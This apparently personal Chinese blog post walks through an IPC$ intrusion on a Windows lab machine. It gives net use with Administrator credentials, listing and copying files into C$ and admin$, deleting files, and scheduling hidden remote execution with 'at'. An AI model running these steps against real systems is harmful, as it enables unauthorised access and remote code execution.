IPC$入侵的流程

网上有很多的IPC$入侵记录,可以自行参考,这里只是一次的过程的记录而已,没有其他额外的内容。


1.建立非空连接

格式:net use \\IP <password> /u:"<Username>"

net use \\192.168.1.121 1qaz2wsx /u:"Administrator"

在域控下:net use \\IP pwd /u:domain\username

2.列一下目录

dir \\192.168.1.121\c$
</pre><pre name="code" class="cpp">显示结果如下:
2015/07/29  12:01    <DIR>          3aaa
2015/06/01  23:23    <DIR>          cXXXX
2015/06/07  23:16    <DIR>          CloudMusic
2015/03/31  17:19    <DIR>          Exam
2009/07/14  11:20    <DIR>          PerfLogs
2015/05/16  10:23    <DIR>          Program Files
2015/07/29  13:06    <DIR>          Program Files (x86)
2015/03/21  15:09    <DIR>          Ramble
2015/03/21  18:43    <DIR>          Task
2015/07/28  11:49                58 testlog.txt
2015/08/09  09:46    <DIR>          Users
2015/08/06  15:38    <DIR>          Windows
2015/05/24  00:42    <DIR>          ADF
               1 个文件             58 字节
              12 个目录  7,865,815,040 可用字节



3.查看远程机器的时间

net time \\192.168.1.121


4.拷贝文件到远程机器

copy 123.txt \\192.168.1.121\C$


copy 123.txt \\192.168.1.121\admin$

//admin$所指路径为C:\Windows\system32


5.删除目标文件
del \\192.168.1.121\admin$\123.txt

6.执行某个程序(无交互)

at \\192.168.1.121 10:36 \\192.168.1.121\C$\mspaint.exe                         //即在后台运行,不会显示出来


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章